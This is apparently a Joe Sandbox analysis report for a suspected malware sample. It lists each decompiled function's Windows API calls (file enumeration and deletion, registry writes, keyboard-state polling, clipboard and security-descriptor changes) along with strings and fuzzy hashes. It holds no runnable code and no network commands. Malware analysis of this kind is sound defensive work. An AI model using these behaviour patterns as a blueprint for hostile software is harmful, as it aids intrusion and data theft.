                                                • FindFirstFileW.KERNEL32(?,?), ref: 007DC819
                                                • FindClose.KERNEL32(00000000), ref: 007DC86D
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DC892
                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 007DC8A9
                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 007DC8D0
                                                • __swprintf.LIBCMT ref: 007DC91C
                                                • __swprintf.LIBCMT ref: 007DC95F
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • __swprintf.LIBCMT ref: 007DC9B3
                                                  • Part of subcall function 00793818: __woutput_l.LIBCMT ref: 00793871
                                                • __swprintf.LIBCMT ref: 007DCA01
                                                  • Part of subcall function 00793818: __flsbuf.LIBCMT ref: 00793893
                                                  • Part of subcall function 00793818: __flsbuf.LIBCMT ref: 007938AB
                                                • __swprintf.LIBCMT ref: 007DCA50
                                                • __swprintf.LIBCMT ref: 007DCA9F
                                                • __swprintf.LIBCMT ref: 007DCAEE
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                • API String ID: 3953360268-2428617273
                                                • Opcode ID: f18b23994459acb75ff674bf408796b3789cf61e9b30dd9f433bafee12d8af76
                                                • Instruction ID: 945731f9f67abb440869da5d1bd16ed35c063dd737d7329f6b6d90b1f4008e58
                                                • Opcode Fuzzy Hash: f18b23994459acb75ff674bf408796b3789cf61e9b30dd9f433bafee12d8af76
                                                • Instruction Fuzzy Hash: E9A144B1405305EBCB04EB54C98ADAFB7ECFF94744F408929F595D2191EB38DA09C762
                                                Function 007DF021 Relevance: 28.1, APIs: 15, Strings: 1, Instructions: 119fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007DF042
                                                • _wcscmp.LIBCMT ref: 007DF057
                                                • _wcscmp.LIBCMT ref: 007DF06E
                                                • GetFileAttributesW.KERNEL32(?), ref: 007DF080
                                                • SetFileAttributesW.KERNEL32(?,?), ref: 007DF09A
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DF0B2
                                                • FindClose.KERNEL32(00000000), ref: 007DF0BD
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 007DF0D9
                                                • _wcscmp.LIBCMT ref: 007DF100
                                                • _wcscmp.LIBCMT ref: 007DF117
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DF129
                                                • SetCurrentDirectoryW.KERNEL32(00828920), ref: 007DF147
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF151
                                                • FindClose.KERNEL32(00000000), ref: 007DF15E
                                                • FindClose.KERNEL32(00000000), ref: 007DF170
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                • String ID: *.*
                                                • API String ID: 1803514871-438819550
                                                • Opcode ID: 3e714a75ae6e4f62d46ea6ef6c76e64887d417b8e2c3905c2fd23aee5279d739
                                                • Instruction ID: 99690589973471b3005642189a493d6ebeb58c523150bf2e09968274b14ee045
                                                • Opcode Fuzzy Hash: 3e714a75ae6e4f62d46ea6ef6c76e64887d417b8e2c3905c2fd23aee5279d739
                                                • Instruction Fuzzy Hash: 7B31C57250121DAADF10EBB4EC49BEE77BCAF04320F104176E915D32A0DB39DA85CA68
                                                Function 007F08E2 Relevance: 26.7, APIs: 9, Strings: 6, Instructions: 477registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F09DE
                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,007FF910,00000000,?,00000000,?,?), ref: 007F0A4C
                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 007F0A94
                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 007F0B1D
                                                • RegCloseKey.ADVAPI32(?), ref: 007F0E3D
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F0E4A
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Close$ConnectCreateRegistryValue
                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                • API String ID: 536824911-966354055
                                                • Opcode ID: 19f965f88890e94bd7450f47c422ca2cd035cac3c39eaed3db38791b081d0f4e
                                                • Instruction ID: 96d2930853f64182d34e403584f2e633b4bd4d3ea7e935e14853ec15d88613e3
                                                • Opcode Fuzzy Hash: 19f965f88890e94bd7450f47c422ca2cd035cac3c39eaed3db38791b081d0f4e
                                                • Instruction Fuzzy Hash: DA023A75204611DFDB14EF24C855A2AB7E5FF88724F04885DFA9A9B362DB38ED01CB81
                                                Function 007DF17E Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 112fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 007DF19F
                                                • _wcscmp.LIBCMT ref: 007DF1B4
                                                • _wcscmp.LIBCMT ref: 007DF1CB
                                                  • Part of subcall function 007D43C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 007D43E1
                                                • FindNextFileW.KERNEL32(00000000,?), ref: 007DF1FA
                                                • FindClose.KERNEL32(00000000), ref: 007DF205
                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 007DF221
                                                • _wcscmp.LIBCMT ref: 007DF248
                                                • _wcscmp.LIBCMT ref: 007DF25F
                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 007DF271
                                                • SetCurrentDirectoryW.KERNEL32(00828920), ref: 007DF28F
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007DF299
                                                • FindClose.KERNEL32(00000000), ref: 007DF2A6
                                                • FindClose.KERNEL32(00000000), ref: 007DF2B8
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                • String ID: *.*
                                                • API String ID: 1824444939-438819550
                                                • Opcode ID: 9a0b0ea22f45762c01595e46e75476bc1f54d6daf9168b1b7213c6470c3a516b
                                                • Instruction ID: 3a6c54e773f10f8e8415e52be7aef1868dec68919047db37caeee39668f19446
                                                • Opcode Fuzzy Hash: 9a0b0ea22f45762c01595e46e75476bc1f54d6daf9168b1b7213c6470c3a516b
                                                • Instruction Fuzzy Hash: D831E776501619BACF109BA4EC49AEE77BCBF05320F104176E915E33A0DB39EE85CA58
                                                Function 007DA279 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 007DA299
                                                • __swprintf.LIBCMT ref: 007DA2BB
                                                • CreateDirectoryW.KERNEL32(?,00000000), ref: 007DA2F8
                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 007DA31D
                                                • _memset.LIBCMT ref: 007DA33C
                                                • _wcsncpy.LIBCMT ref: 007DA378
                                                • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 007DA3AD
                                                • CloseHandle.KERNEL32(00000000), ref: 007DA3B8
                                                • RemoveDirectoryW.KERNEL32(?), ref: 007DA3C1
                                                • CloseHandle.KERNEL32(00000000), ref: 007DA3CB
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                • String ID: :$\$\??\%s
                                                • API String ID: 2733774712-3457252023
                                                • Opcode ID: 49a537ea511be1d619fb4fada582bb2a64fa228e4458780e81a5d013dca79b4d
                                                • Instruction ID: daff96aa19be97595d18f0b010a1349689b3102070247a2f23e163d632800b66
                                                • Opcode Fuzzy Hash: 49a537ea511be1d619fb4fada582bb2a64fa228e4458780e81a5d013dca79b4d
                                                • Instruction Fuzzy Hash: 4B31807650010ABBDB209FA0DC49FAB77BDFF88740F5441B6F908D6160EB789645CB25
                                                Function 007C81D4 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007C852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 007C8546
                                                  • Part of subcall function 007C852A: GetLastError.KERNEL32(?,007C800A,?,?,?), ref: 007C8550
                                                  • Part of subcall function 007C852A: GetProcessHeap.KERNEL32(00000008,?,?,007C800A,?,?,?), ref: 007C855F
                                                  • Part of subcall function 007C852A: HeapAlloc.KERNEL32(00000000,?,007C800A,?,?,?), ref: 007C8566
                                                  • Part of subcall function 007C852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 007C857D
                                                  • Part of subcall function 007C85C7: GetProcessHeap.KERNEL32(00000008,007C8020,00000000,00000000,?,007C8020,?), ref: 007C85D3
                                                  • Part of subcall function 007C85C7: HeapAlloc.KERNEL32(00000000,?,007C8020,?), ref: 007C85DA
                                                  • Part of subcall function 007C85C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,007C8020,?), ref: 007C85EB
                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 007C8238
                                                • _memset.LIBCMT ref: 007C824D
                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 007C826C
                                                • GetLengthSid.ADVAPI32(?), ref: 007C827D
                                                • GetAce.ADVAPI32(?,00000000,?), ref: 007C82BA
                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 007C82D6
                                                • GetLengthSid.ADVAPI32(?), ref: 007C82F3
                                                • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 007C8302
                                                • HeapAlloc.KERNEL32(00000000), ref: 007C8309
                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 007C832A
                                                • CopySid.ADVAPI32(00000000), ref: 007C8331
                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 007C8362
                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 007C8388
                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 007C839C
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                • String ID:
                                                • API String ID: 3996160137-0
                                                • Opcode ID: 63d69e44ca723c2aec4fbd10588e9bd16d35147b19fafd958a9dcb3bd5549b2c
                                                • Instruction ID: 044b796e025dc56facab0a715a11e6a50b33499ca928562d4080fbf13ca62091
                                                • Opcode Fuzzy Hash: 63d69e44ca723c2aec4fbd10588e9bd16d35147b19fafd958a9dcb3bd5549b2c
                                                • Instruction Fuzzy Hash: 2461557190021AEFCF109FA4DC48EEEBBB9FF04700F04812DE915AA291DF389A01CB61
                                                Function 00786841 Relevance: 19.6, Strings: 15, Instructions: 889COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oax$UCP)$UTF)$UTF16)
                                                • API String ID: 0-1328661864
                                                • Opcode ID: 60f5ea35a2b7c2016e3281b2e22fe3cd4f3414a1dd9845e0c381133f171117d2
                                                • Instruction ID: bb83028a78760b10446538e19f31cd396675c98363164cb341b6ee8f0976e45a
                                                • Opcode Fuzzy Hash: 60f5ea35a2b7c2016e3281b2e22fe3cd4f3414a1dd9845e0c381133f171117d2
                                                • Instruction Fuzzy Hash: 2D726D75E00219DBDB24DF58D840BADB7B5FF49310F54816EE849EB281EB389E81CB90
                                                Function 007F0465 Relevance: 16.9, APIs: 11, Instructions: 397registryCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007F0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007EFE38,?,?), ref: 007F0EBC
                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F0537
                                                  • Part of subcall function 00779997: __itow.LIBCMT ref: 007799C2
                                                  • Part of subcall function 00779997: __swprintf.LIBCMT ref: 00779A0C
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 007F05D6
                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 007F066E
                                                • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 007F08AD
                                                • RegCloseKey.ADVAPI32(00000000), ref: 007F08BA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                • String ID:
                                                • API String ID: 1240663315-0
                                                • Opcode ID: e63cb97d3d9d58af16751303d917917997ffcddd707070fb7866ad36b80ce5ba
                                                • Instruction ID: aa8bb1f60f1de3f68bfa2a3b43a5ea2bdfb486026219c7fa6ec22751b7ffe0d6
                                                • Opcode Fuzzy Hash: e63cb97d3d9d58af16751303d917917997ffcddd707070fb7866ad36b80ce5ba
                                                • Instruction Fuzzy Hash: 48E15C31604214EFCB14DF29C885E6ABBE9EF88754B04856DF54ADB362DB38ED01CB91
                                                Function 007D003A Relevance: 16.6, APIs: 11, Instructions: 120keyboardCOMMON
                                                Download Yara Rule
                                                APIs
                                                • GetKeyboardState.USER32(?), ref: 007D0062
                                                • GetAsyncKeyState.USER32(000000A0), ref: 007D00E3
                                                • GetKeyState.USER32(000000A0), ref: 007D00FE
                                                • GetAsyncKeyState.USER32(000000A1), ref: 007D0118
                                                • GetKeyState.USER32(000000A1), ref: 007D012D
                                                • GetAsyncKeyState.USER32(00000011), ref: 007D0145
                                                • GetKeyState.USER32(00000011), ref: 007D0157
                                                • GetAsyncKeyState.USER32(00000012), ref: 007D016F
                                                • GetKeyState.USER32(00000012), ref: 007D0181
                                                • GetAsyncKeyState.USER32(0000005B), ref: 007D0199
                                                • GetKeyState.USER32(0000005B), ref: 007D01AB
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: State$Async$Keyboard
                                                • String ID:
                                                • API String ID: 541375521-0
                                                • Opcode ID: 4c23e66c2f74e05a98d353b4c6ccda37985a24721aad4b5fc8d87e802d586109
                                                • Instruction ID: 8d467b357b94da9967799407128afa296cf9f1ea1deeabecf4908894d3d28fe3
                                                • Opcode Fuzzy Hash: 4c23e66c2f74e05a98d353b4c6ccda37985a24721aad4b5fc8d87e802d586109
                                                • Instruction Fuzzy Hash: 3241A824A047CE69FF319A6488047B9FEB1AF11340F08909BD5C6477C2EB9D99D8C7E6
                                                Function 007E427A Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                • String ID:
                                                • API String ID: 1737998785-0
                                                • Opcode ID: dc1e1003130bae0d43c60513970fdc7c7c38fdc69e6e0ba78b8e99f84a5b3edb
                                                • Instruction ID: a0d9a654f25cf3827440390567f90fffd078e0599d438b0479312e7333a78479
                                                • Opcode Fuzzy Hash: dc1e1003130bae0d43c60513970fdc7c7c38fdc69e6e0ba78b8e99f84a5b3edb
                                                • Instruction Fuzzy Hash: B7215E352026109FDB10AF65DC49B7D77A8FF48751F15C02AFA46DB2A1DF38A801CB59
                                                Function 007D3833 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 167fileCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 007748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007748A1,?,?,007737C0,?), ref: 007748CE
                                                  • Part of subcall function 007D4AD8: GetFileAttributesW.KERNEL32(?,007D374F), ref: 007D4AD9
                                                • FindFirstFileW.KERNEL32(?,?), ref: 007D38E7
                                                • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 007D398F
                                                • MoveFileW.KERNEL32(?,?), ref: 007D39A2
                                                • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 007D39BF
                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 007D39E1
                                                • FindClose.KERNEL32(00000000,?,?,?,?), ref: 007D39FD
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                • String ID: \*.*
                                                • API String ID: 4002782344-1173974218
                                                • Opcode ID: 53dec7ef8c2bf270e9e8dd9f10a77a4be30f9f0fdd133457ac1e3d3df075dedf
                                                • Instruction ID: f604d765f5e15ad65d352aabf60867367f4c27e188094fc57b526daa07bec26f
                                                • Opcode Fuzzy Hash: 53dec7ef8c2bf270e9e8dd9f10a77a4be30f9f0fdd133457ac1e3d3df075dedf
                                                • Instruction Fuzzy Hash: FD51A23180420CDACF15EBA0DD9A9FDB778AF14344F64816AE44677291EF786F09CBA1
                                                Function 00784140 Relevance: 13.4, APIs: 1, Strings: 6, Instructions: 1132COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID:
                                                • String ID: ERCP$Oax$VUUU$VUUU$VUUU$VUUU
                                                • API String ID: 0-919343562
                                                • Opcode ID: fd0eccb24a0f100716815e51bf1bcc7252e6623112044c864238b991bc0aec73
                                                • Instruction ID: 4a09d5126b982ed4fdaa45a9bc7411f7bfaabe538068e82c0a3f7f8360077c53
                                                • Opcode Fuzzy Hash: fd0eccb24a0f100716815e51bf1bcc7252e6623112044c864238b991bc0aec73
                                                • Instruction Fuzzy Hash: 56A26F70E4421ACBDF28EF58C9947EDB7B1FF54314F1481AAD85AA7280E7789E81CB50
                                                Function 007DF47F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120filesleepCOMMON
                                                Download Yara Rule
                                                APIs
                                                  • Part of subcall function 00777F41: _memmove.LIBCMT ref: 00777F82
                                                • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 007DF4CC
                                                • Sleep.KERNEL32(0000000A), ref: 007DF4FC
                                                • _wcscmp.LIBCMT ref: 007DF510
                                                • _wcscmp.LIBCMT ref: 007DF52B
                                                • FindNextFileW.KERNEL32(?,?), ref: 007DF5C9
                                                • FindClose.KERNEL32(00000000), ref: 007DF5DF
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711576520.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711723711.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.1711776411.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_770000_rP0n___87004354.jbxd
                                                Similarity
                                                • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                • String ID: *.*
                                                • API String ID: 713712311-438819550
                                                • Opcode ID: e34775f967918fc0c7c34e1d5d2723f57087c40389b05a7db6b6ddf7393021a6
                                                • Instruction ID: 2b7a3af392c22585dabe845200e0e748b8492b4e7637575635ea0304d2f2089f
                                                • Opcode Fuzzy Hash: e34775f967918fc0c7c34e1d5d2723f57087c40389b05a7db6b6ddf7393021a6
                                                • Instruction Fuzzy Hash: E941727590021AEBCF14DFA4DC49AEE7BB4FF05350F144566E81AA3291DB389E54CB90
                                                Function 007858C0 Relevance: 11.0, APIs: 7, Instructions: 532COMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.1711476253.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true
                                                • Associated: 00000000.00000002.1711430122.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
